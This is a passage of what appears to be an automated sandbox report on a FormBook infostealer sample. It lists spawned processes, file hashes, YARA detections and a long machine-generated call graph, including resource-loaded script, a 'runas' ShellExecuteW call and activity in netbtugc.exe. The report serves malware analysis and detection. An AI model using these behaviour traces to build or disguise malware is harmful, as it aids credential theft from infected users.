                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2149589488.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2149639363.0000000004390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2149639363.0000000004390000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:09:32:02
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe"
                                                                                    Imagebase:0x140000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4462305414.0000000003780000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4462305414.0000000003780000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:4
                                                                                    Start time:09:32:03
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                    Imagebase:0xda0000
                                                                                    File size:22'016 bytes
                                                                                    MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4461185601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4461185601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4462330271.0000000000820000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4462330271.0000000000820000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    Target ID:6
                                                                                    Start time:09:32:16
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe"
                                                                                    Imagebase:0x140000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:7
                                                                                    Start time:09:32:28
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                    Imagebase:0x7ff79f9e0000
                                                                                    File size:676'768 bytes
                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true


                                                                                      Execution Graph

                                                                                      Execution Coverage:2.6%
                                                                                      Dynamic/Decrypted Code Coverage:1.1%
                                                                                      Signature Coverage:3.2%
                                                                                      Total number of Nodes:1587
                                                                                      Total number of Limit Nodes:41
                                                                                      execution_graph 97112 32de3 97113 32df0 __wsopen_s 97112->97113 97114 32e09 97113->97114 97115 72c2b ___scrt_fastfail 97113->97115 97128 33aa2 97114->97128 97118 72c47 GetOpenFileNameW 97115->97118 97120 72c96 97118->97120 97186 36b57 97120->97186 97123 72cab 97123->97123 97125 32e27 97156 344a8 97125->97156 97198 71f50 97128->97198 97131 33ae9 97204 3a6c3 97131->97204 97132 33ace 97133 36b57 22 API calls 97132->97133 97135 33ada 97133->97135 97200 337a0 97135->97200 97138 32da5 97139 71f50 __wsopen_s 97138->97139 97140 32db2 GetLongPathNameW 97139->97140 97141 36b57 22 API calls 97140->97141 97142 32dda 97141->97142 97143 33598 97142->97143 97255 3a961 97143->97255 97146 33aa2 23 API calls 97147 335b5 97146->97147 97148 335c0 97147->97148 97152 732eb 97147->97152 97260 3515f 97148->97260 97153 7330d 97152->97153 97272 4ce60 41 API calls 97152->97272 97155 335df 97155->97125 97273 34ecb 97156->97273 97159 73833 97295 a2cf9 97159->97295 97161 34ecb 94 API calls 97163 344e1 97161->97163 97162 73848 97164 7384c 97162->97164 97165 73869 97162->97165 97163->97159 97166 344e9 97163->97166 97339 34f39 97164->97339 97168 4fe0b 22 API calls 97165->97168 97169 73854 97166->97169 97170 344f5 97166->97170 97185 738ae 97168->97185 97345 9da5a 82 API calls 97169->97345 97338 3940c 136 API calls 2 library calls 97170->97338 97173 73862 97173->97165 97174 32e31 97175 73a5f 97180 73a67 97175->97180 97176 34f39 68 API calls 97176->97180 97180->97176 97348 9989b 82 API calls __wsopen_s 97180->97348 97182 39cb3 22 API calls 97182->97185 97185->97175 97185->97180 97185->97182 97321 9967e 97185->97321 97324 3a4a1 97185->97324 97332 33ff7 97185->97332 97346 995ad 42 API calls _wcslen 97185->97346 97347 a0b5a 22 API calls 97185->97347 97187 36b67 _wcslen 97186->97187 97188 74ba1 97186->97188 97191 36ba2 97187->97191 97192 36b7d 97187->97192 97189 393b2 22 API calls 97188->97189 97190 74baa 97189->97190 
97190->97190 97193 4fddb 22 API calls 97191->97193 97695 36f34 22 API calls 97192->97695 97195 36bae 97193->97195 97196 4fe0b 22 API calls 97195->97196 97197 36b85 __fread_nolock 97196->97197 97197->97123 97199 33aaf GetFullPathNameW 97198->97199 97199->97131 97199->97132 97201 337ae 97200->97201 97210 393b2 97201->97210 97203 32e12 97203->97138 97205 3a6dd 97204->97205 97209 3a6d0 97204->97209 97206 4fddb 22 API calls 97205->97206 97207 3a6e7 97206->97207 97208 4fe0b 22 API calls 97207->97208 97208->97209 97209->97135 97211 393c0 97210->97211 97213 393c9 __fread_nolock 97210->97213 97211->97213 97214 3aec9 97211->97214 97213->97203 97215 3aedc 97214->97215 97219 3aed9 __fread_nolock 97214->97219 97220 4fddb 97215->97220 97217 3aee7 97230 4fe0b 97217->97230 97219->97213 97222 4fde0 97220->97222 97223 4fdfa 97222->97223 97227 4fdfc 97222->97227 97240 5ea0c 97222->97240 97247 54ead 7 API calls 2 library calls 97222->97247 97223->97217 97225 5066d 97249 532a4 RaiseException 97225->97249 97227->97225 97248 532a4 RaiseException 97227->97248 97228 5068a 97228->97217 97232 4fddb 97230->97232 97231 5ea0c ___std_exception_copy 21 API calls 97231->97232 97232->97231 97233 4fdfa 97232->97233 97235 4fdfc 97232->97235 97252 54ead 7 API calls 2 library calls 97232->97252 97233->97219 97236 5066d 97235->97236 97253 532a4 RaiseException 97235->97253 97254 532a4 RaiseException 97236->97254 97239 5068a 97239->97219 97246 63820 _abort 97240->97246 97241 6385e 97251 5f2d9 20 API calls _abort 97241->97251 97243 63849 RtlAllocateHeap 97244 6385c 97243->97244 97243->97246 97244->97222 97246->97241 97246->97243 97250 54ead 7 API calls 2 library calls 97246->97250 97247->97222 97248->97225 97249->97228 97250->97246 97251->97244 97252->97232 97253->97236 97254->97239 97256 4fe0b 22 API calls 97255->97256 97257 3a976 97256->97257 97258 4fddb 22 API calls 97257->97258 97259 335aa 97258->97259 97259->97146 97261 3516e 97260->97261 97265 3518f __fread_nolock 97260->97265 97263 4fe0b 22 API 
calls 97261->97263 97262 4fddb 22 API calls 97264 335cc 97262->97264 97263->97265 97266 335f3 97264->97266 97265->97262 97267 33605 97266->97267 97271 33624 __fread_nolock 97266->97271 97269 4fe0b 22 API calls 97267->97269 97268 4fddb 22 API calls 97270 3363b 97268->97270 97269->97271 97270->97155 97271->97268 97272->97152 97349 34e90 LoadLibraryA 97273->97349 97278 34ef6 LoadLibraryExW 97357 34e59 LoadLibraryA 97278->97357 97279 73ccf 97280 34f39 68 API calls 97279->97280 97283 73cd6 97280->97283 97285 34e59 3 API calls 97283->97285 97287 73cde 97285->97287 97286 34f20 97286->97287 97288 34f2c 97286->97288 97379 350f5 97287->97379 97289 34f39 68 API calls 97288->97289 97291 344cd 97289->97291 97291->97159 97291->97161 97294 73d05 97296 a2d15 97295->97296 97297 3511f 64 API calls 97296->97297 97298 a2d29 97297->97298 97529 a2e66 97298->97529 97301 350f5 40 API calls 97302 a2d56 97301->97302 97303 350f5 40 API calls 97302->97303 97304 a2d66 97303->97304 97305 350f5 40 API calls 97304->97305 97306 a2d81 97305->97306 97307 350f5 40 API calls 97306->97307 97308 a2d9c 97307->97308 97309 3511f 64 API calls 97308->97309 97310 a2db3 97309->97310 97311 5ea0c ___std_exception_copy 21 API calls 97310->97311 97312 a2dba 97311->97312 97313 5ea0c ___std_exception_copy 21 API calls 97312->97313 97314 a2dc4 97313->97314 97315 350f5 40 API calls 97314->97315 97316 a2dd8 97315->97316 97317 a28fe 27 API calls 97316->97317 97318 a2dee 97317->97318 97320 a2d3f 97318->97320 97535 a22ce 97318->97535 97320->97162 97322 4fe0b 22 API calls 97321->97322 97323 996ae __fread_nolock 97322->97323 97323->97185 97326 3a52b 97324->97326 97331 3a4b1 __fread_nolock 97324->97331 97325 4fddb 22 API calls 97327 3a4b8 97325->97327 97328 4fe0b 22 API calls 97326->97328 97329 4fddb 22 API calls 97327->97329 97330 3a4d6 97327->97330 97328->97331 97329->97330 97330->97185 97331->97325 97333 3400a 97332->97333 97335 340ae 97332->97335 97334 4fe0b 22 API calls 97333->97334 97336 3403c 97333->97336 97334->97336 
97335->97185 97336->97335 97337 4fddb 22 API calls 97336->97337 97337->97336 97338->97174 97340 34f43 97339->97340 97341 34f4a 97339->97341 97342 5e678 67 API calls 97340->97342 97343 34f6a FreeLibrary 97341->97343 97344 34f59 97341->97344 97342->97341 97343->97344 97344->97169 97345->97173 97346->97185 97347->97185 97348->97180 97350 34ec6 97349->97350 97351 34ea8 GetProcAddress 97349->97351 97354 5e5eb 97350->97354 97352 34eb8 97351->97352 97352->97350 97353 34ebf FreeLibrary 97352->97353 97353->97350 97387 5e52a 97354->97387 97356 34eea 97356->97278 97356->97279 97358 34e6e GetProcAddress 97357->97358 97359 34e8d 97357->97359 97360 34e7e 97358->97360 97362 34f80 97359->97362 97360->97359 97361 34e86 FreeLibrary 97360->97361 97361->97359 97363 4fe0b 22 API calls 97362->97363 97364 34f95 97363->97364 97455 35722 97364->97455 97366 34fa1 __fread_nolock 97367 350a5 97366->97367 97368 73d1d 97366->97368 97378 34fdc 97366->97378 97458 342a2 CreateStreamOnHGlobal 97367->97458 97469 a304d 74 API calls 97368->97469 97371 73d22 97373 3511f 64 API calls 97371->97373 97372 350f5 40 API calls 97372->97378 97374 73d45 97373->97374 97375 350f5 40 API calls 97374->97375 97377 3506e ISource 97375->97377 97377->97286 97378->97371 97378->97372 97378->97377 97464 3511f 97378->97464 97380 35107 97379->97380 97381 73d70 97379->97381 97491 5e8c4 97380->97491 97384 a28fe 97512 a274e 97384->97512 97386 a2919 97386->97294 97389 5e536 ___scrt_is_nonwritable_in_current_image 97387->97389 97388 5e544 97412 5f2d9 20 API calls _abort 97388->97412 97389->97388 97392 5e574 97389->97392 97391 5e549 97413 627ec 26 API calls __wsopen_s 97391->97413 97394 5e586 97392->97394 97395 5e579 97392->97395 97404 68061 97394->97404 97414 5f2d9 20 API calls _abort 97395->97414 97398 5e58f 97399 5e595 97398->97399 97400 5e5a2 97398->97400 97415 5f2d9 20 API calls _abort 97399->97415 97416 5e5d4 LeaveCriticalSection __fread_nolock 97400->97416 97402 5e554 __wsopen_s 97402->97356 97405 6806d 
Execution Graph (text serialization of the report's interactive call-graph view; the raw node and edge list is omitted here). Each node is a function address in the sample, optionally annotated with the Windows API calls it makes or with a summary such as "22 API calls". API nodes recoverable from the graph:
Runtime and synchronization: EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, InterlockedExchange, SetEvent, ResetEvent, WaitForSingleObjectEx, RtlAllocateHeap, RtlFreeHeap, GetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, Sleep, timeGetTime
Resources and UI: FindResourceExW, LoadResource, SizeofResource, LockResource, LoadStringW, DestroyIcon, CreateWindowExW, ShowWindow, Shell_NotifyIconW, PeekMessageW, TranslateMessage, DispatchMessageW, TranslateAcceleratorW, IsDialogMessageW, GetClassLongW, GetInputState, GetForegroundWindow, RegisterWindowMessageW, SystemParametersInfoW, OleInitialize, GetStdHandle, CharUpperBuffW, CharLowerBuffW
File, process and memory: CreateFileW, GetFileType, ReadFile, WriteFile, SetFilePointerEx, GetFileAttributesW, FindFirstFileW, FindClose, lstrlenW, CloseHandle, GetModuleFileNameW, SetCurrentDirectoryW, ShellExecuteW, GetCurrentProcess, DuplicateHandle, CreateThread, GetExitCodeProcess, WaitForSingleObject, TerminateProcess, FreeLibrary, VirtualProtect, VirtualAlloc, ExitProcess
Registry: RegOpenKeyExW, RegQueryValueExW, RegCloseKey
Notable chain: a function region at 0x117acf0, outside the 0x3xxxx-0xcxxxx address range of the other nodes, calls GetPEB and then Sleep; a sibling path at 0x117add7 calls CreateFileW, VirtualAlloc and ReadFile in sequence and ends in ExitProcess.
98850->98884 98854 34af0 __wsopen_s 98853->98854 98855 36b57 22 API calls 98854->98855 98856 34b22 98854->98856 98855->98856 98859 34b58 98856->98859 98892 34c6d 98856->98892 98858 34c29 98860 39cb3 22 API calls 98858->98860 98863 34c5e 98858->98863 98859->98858 98861 39cb3 22 API calls 98859->98861 98864 34c6d 22 API calls 98859->98864 98866 3515f 22 API calls 98859->98866 98862 34c52 98860->98862 98861->98859 98865 3515f 22 API calls 98862->98865 98863->98778 98864->98859 98865->98863 98866->98859 98867->98792 98868->98795 98869->98800 98870->98810 98871->98818 98872->98822 98873->98827 98874->98832 98875->98835 98876->98839 98877->98843 98878->98836 98879->98842 98880->98846 98881->98850 98882->98850 98883->98850 98884->98850 98885->98802 98886->98806 98887->98812 98888->98816 98889->98821 98890->98826 98891->98830 98893 3aec9 22 API calls 98892->98893 98894 34c78 98893->98894 98894->98856 98895 33156 98898 33170 98895->98898 98899 33187 98898->98899 98900 331eb 98899->98900 98901 3318c 98899->98901 98938 331e9 98899->98938 98903 331f1 98900->98903 98904 72dfb 98900->98904 98905 33265 PostQuitMessage 98901->98905 98906 33199 98901->98906 98902 331d0 DefWindowProcW 98940 3316a 98902->98940 98907 331f8 98903->98907 98908 3321d SetTimer RegisterWindowMessageW 98903->98908 98947 318e2 10 API calls 98904->98947 98905->98940 98910 331a4 98906->98910 98911 72e7c 98906->98911 98912 33201 KillTimer 98907->98912 98913 72d9c 98907->98913 98915 33246 CreatePopupMenu 98908->98915 98908->98940 98916 331ae 98910->98916 98917 72e68 98910->98917 98952 9bf30 34 API calls ___scrt_fastfail 98911->98952 98943 330f2 Shell_NotifyIconW ___scrt_fastfail 98912->98943 98919 72dd7 MoveWindow 98913->98919 98920 72da1 98913->98920 98914 72e1c 98948 4e499 42 API calls 98914->98948 98915->98940 98924 72e4d 98916->98924 98925 331b9 98916->98925 98951 9c161 27 API calls ___scrt_fastfail 98917->98951 98919->98940 98927 72da7 98920->98927 98928 72dc6 SetFocus 98920->98928 98924->98902 98950 90ad7 
22 API calls 98924->98950 98931 331c4 98925->98931 98932 33253 98925->98932 98926 72e8e 98926->98902 98926->98940 98927->98931 98933 72db0 98927->98933 98928->98940 98929 33214 98944 33c50 DeleteObject DestroyWindow 98929->98944 98930 33263 98930->98940 98931->98902 98949 330f2 Shell_NotifyIconW ___scrt_fastfail 98931->98949 98945 3326f 44 API calls ___scrt_fastfail 98932->98945 98946 318e2 10 API calls 98933->98946 98938->98902 98941 72e41 98942 33837 49 API calls 98941->98942 98942->98938 98943->98929 98944->98940 98945->98930 98946->98940 98947->98914 98948->98931 98949->98941 98950->98938 98951->98930 98952->98926 98953 3105b 98958 3344d 98953->98958 98955 3106a 98989 500a3 29 API calls __onexit 98955->98989 98957 31074 98959 3345d __wsopen_s 98958->98959 98960 3a961 22 API calls 98959->98960 98961 33513 98960->98961 98962 33a5a 24 API calls 98961->98962 98963 3351c 98962->98963 98990 33357 98963->98990 98966 333c6 22 API calls 98967 33535 98966->98967 98968 3515f 22 API calls 98967->98968 98969 33544 98968->98969 98970 3a961 22 API calls 98969->98970 98971 3354d 98970->98971 98972 3a6c3 22 API calls 98971->98972 98973 33556 RegOpenKeyExW 98972->98973 98974 73176 RegQueryValueExW 98973->98974 98978 33578 98973->98978 98975 73193 98974->98975 98976 7320c RegCloseKey 98974->98976 98977 4fe0b 22 API calls 98975->98977 98976->98978 98988 7321e _wcslen 98976->98988 98979 731ac 98977->98979 98978->98955 98981 35722 22 API calls 98979->98981 98980 34c6d 22 API calls 98980->98988 98982 731b7 RegQueryValueExW 98981->98982 98983 731d4 98982->98983 98985 731ee ISource 98982->98985 98984 36b57 22 API calls 98983->98984 98984->98985 98985->98976 98986 39cb3 22 API calls 98986->98988 98987 3515f 22 API calls 98987->98988 98988->98978 98988->98980 98988->98986 98988->98987 98989->98957 98991 71f50 __wsopen_s 98990->98991 98992 33364 GetFullPathNameW 98991->98992 98993 33386 98992->98993 98994 36b57 22 API calls 98993->98994 98995 333a4 98994->98995 98995->98966 98996 31098 
99001 342de 98996->99001 99000 310a7 99002 3a961 22 API calls 99001->99002 99003 342f5 GetVersionExW 99002->99003 99004 36b57 22 API calls 99003->99004 99005 34342 99004->99005 99006 393b2 22 API calls 99005->99006 99015 34378 99005->99015 99007 3436c 99006->99007 99009 337a0 22 API calls 99007->99009 99008 3441b GetCurrentProcess IsWow64Process 99010 34437 99008->99010 99009->99015 99011 73824 GetSystemInfo 99010->99011 99012 3444f LoadLibraryA 99010->99012 99013 34460 GetProcAddress 99012->99013 99014 3449c GetSystemInfo 99012->99014 99013->99014 99017 34470 GetNativeSystemInfo 99013->99017 99018 34476 99014->99018 99015->99008 99016 737df 99015->99016 99017->99018 99019 3109d 99018->99019 99020 3447a FreeLibrary 99018->99020 99021 500a3 29 API calls __onexit 99019->99021 99020->99019 99021->99000 99022 3f7bf 99023 3f7d3 99022->99023 99024 3fcb6 99022->99024 99026 3fcc2 99023->99026 99027 4fddb 22 API calls 99023->99027 99059 3aceb 23 API calls ISource 99024->99059 99060 3aceb 23 API calls ISource 99026->99060 99029 3f7e5 99027->99029 99029->99026 99030 3fd3d 99029->99030 99031 3f83e 99029->99031 99061 a1155 22 API calls 99030->99061 99033 41310 207 API calls 99031->99033 99048 3ed9d ISource 99031->99048 99054 3ec76 ISource 99033->99054 99034 4fddb 22 API calls 99034->99054 99036 3fef7 99036->99048 99063 3a8c7 22 API calls __fread_nolock 99036->99063 99038 84600 99038->99048 99062 3a8c7 22 API calls __fread_nolock 99038->99062 99039 84b0b 99065 a359c 82 API calls __wsopen_s 99039->99065 99045 3a8c7 22 API calls 99045->99054 99046 3fbe3 99046->99048 99049 84bdc 99046->99049 99056 3f3ae ISource 99046->99056 99047 3a961 22 API calls 99047->99054 99066 a359c 82 API calls __wsopen_s 99049->99066 99050 500a3 29 API calls pre_c_initialization 99050->99054 99052 50242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99052->99054 99053 84beb 99067 a359c 82 API calls __wsopen_s 99053->99067 99054->99034 99054->99036 
99054->99038 99054->99039 99054->99045 99054->99046 99054->99047 99054->99048 99054->99050 99054->99052 99054->99053 99055 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 99054->99055 99054->99056 99057 401e0 207 API calls 2 library calls 99054->99057 99058 406a0 41 API calls ISource 99054->99058 99055->99054 99056->99048 99064 a359c 82 API calls __wsopen_s 99056->99064 99057->99054 99058->99054 99059->99026 99060->99030 99061->99048 99062->99048 99063->99048 99064->99048 99065->99048 99066->99053 99067->99048 99068 503fb 99069 50407 ___scrt_is_nonwritable_in_current_image 99068->99069 99097 4feb1 99069->99097 99071 5040e 99072 50561 99071->99072 99075 50438 99071->99075 99124 5083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 99072->99124 99074 50568 99125 54e52 28 API calls _abort 99074->99125 99077 50477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 99075->99077 99108 6247d 99075->99108 99085 504d8 99077->99085 99120 54e1a 38 API calls 2 library calls 99077->99120 99078 5056e 99126 54e04 28 API calls _abort 99078->99126 99081 50576 99083 50457 99116 50959 99085->99116 99088 504de 99089 504f3 99088->99089 99121 50992 GetModuleHandleW 99089->99121 99091 504fa 99091->99074 99092 504fe 99091->99092 99093 50507 99092->99093 99122 54df5 28 API calls _abort 99092->99122 99123 50040 13 API calls 2 library calls 99093->99123 99096 5050f 99096->99083 99098 4feba 99097->99098 99127 50698 IsProcessorFeaturePresent 99098->99127 99100 4fec6 99128 52c94 10 API calls 3 library calls 99100->99128 99102 4fecb 99103 4fecf 99102->99103 99129 62317 99102->99129 99103->99071 99106 4fee6 99106->99071 99110 62494 99108->99110 99109 50a8c CatchGuardHandler 5 API calls 99111 50451 99109->99111 99110->99109 99111->99083 99112 62421 99111->99112 99113 62450 99112->99113 99114 50a8c CatchGuardHandler 5 API calls 99113->99114 99115 62479 99114->99115 
99115->99077 99180 52340 99116->99180 99119 5097f 99119->99088 99120->99085 99121->99091 99122->99093 99123->99096 99124->99074 99125->99078 99126->99081 99127->99100 99128->99102 99133 6d1f6 99129->99133 99132 52cbd 8 API calls 3 library calls 99132->99103 99134 6d213 99133->99134 99137 6d20f 99133->99137 99134->99137 99139 64bfb 99134->99139 99136 4fed8 99136->99106 99136->99132 99151 50a8c 99137->99151 99140 64c07 ___scrt_is_nonwritable_in_current_image 99139->99140 99158 62f5e EnterCriticalSection 99140->99158 99142 64c0e 99159 650af 99142->99159 99144 64c1d 99149 64c2c 99144->99149 99172 64a8f 29 API calls 99144->99172 99147 64c27 99173 64b45 GetStdHandle GetFileType 99147->99173 99174 64c48 LeaveCriticalSection _abort 99149->99174 99150 64c3d __wsopen_s 99150->99134 99152 50a95 99151->99152 99153 50a97 IsProcessorFeaturePresent 99151->99153 99152->99136 99155 50c5d 99153->99155 99179 50c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 99155->99179 99157 50d40 99157->99136 99158->99142 99160 650bb ___scrt_is_nonwritable_in_current_image 99159->99160 99161 650df 99160->99161 99162 650c8 99160->99162 99175 62f5e EnterCriticalSection 99161->99175 99176 5f2d9 20 API calls _abort 99162->99176 99165 650cd 99177 627ec 26 API calls __wsopen_s 99165->99177 99167 65117 99178 6513e LeaveCriticalSection _abort 99167->99178 99168 650d7 __wsopen_s 99168->99144 99169 650eb 99169->99167 99171 65000 __wsopen_s 21 API calls 99169->99171 99171->99169 99172->99147 99173->99149 99174->99150 99175->99169 99176->99165 99177->99168 99178->99168 99179->99157 99181 5096c GetStartupInfoW 99180->99181 99181->99119

Control-flow Graph
APIs
• GetVersionExW.KERNEL32(?), ref: 0003430D
  • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
• GetCurrentProcess.KERNEL32(?,000CCB64,00000000,?,?), ref: 00034422
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00034429
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00034454
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00034466
• GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00034474
• FreeLibrary.KERNEL32(00000000,?,?), ref: 0003447B
• GetSystemInfo.KERNEL32(?,?,?), ref: 000344A0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$X$kernel32.dll$|O
• API String ID: 3290436268-386561903
• Opcode ID: 71f730adca2e91ac06fb98ea5d6559dce0737208af968560d234898b079c5058
• Instruction ID: 562c7bc3c51465ea5e242cbcf6fe9f8274ff7d4cb6b846dae06d5a91df09f111
• Opcode Fuzzy Hash: 71f730adca2e91ac06fb98ea5d6559dce0737208af968560d234898b079c5058
• Instruction Fuzzy Hash: 3FA1E962D0A2C4FFD726C76A7C815997FD87B26320F0884A8D0C59FE22D2BC45C4DB25

Control-flow Graph
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,000350AA,?,?,00000000,00000000), ref: 000342B2
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000350AA,?,?,00000000,00000000), ref: 000342C9
• LoadResource.KERNEL32(?,00000000,?,?,000350AA,?,?,00000000,00000000,?,?,?,?,?,?,00034F20), ref: 000735BE
• SizeofResource.KERNEL32(?,00000000,?,?,000350AA,?,?,00000000,00000000,?,?,?,?,?,?,00034F20), ref: 000735D3
• LockResource.KERNEL32(000350AA,?,?,000350AA,?,?,00000000,00000000,?,?,?,?,?,?,00034F20,?), ref: 000735E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
• Opcode ID: e65843b05452c098fc53c410784f14bfb01bbd2de4cd2ce20edb241d8ac4a254
• Instruction ID: 625e3f2b414380327432585323face6991277067d6ea4099553cec483d9908a7
• Opcode Fuzzy Hash: e65843b05452c098fc53c410784f14bfb01bbd2de4cd2ce20edb241d8ac4a254
• Instruction Fuzzy Hash: 91117C70600700BFF7228BA6DC48F277BBDEBC6B51F148169F4169A660DB75EC008A20

Control-flow Graph

APIs
• SetCurrentDirectoryW.KERNEL32(?), ref: 00032B6B
  • Part of subcall function 00033A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00101418,?,00032E7F,?,?,?,00000000), ref: 00033A78
  • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
• GetForegroundWindow.USER32(runas,?,?,?,?,?,000F2224), ref: 00072C10
• ShellExecuteW.SHELL32(00000000,?,?,000F2224), ref: 00072C17
Strings
Memory Dump Source
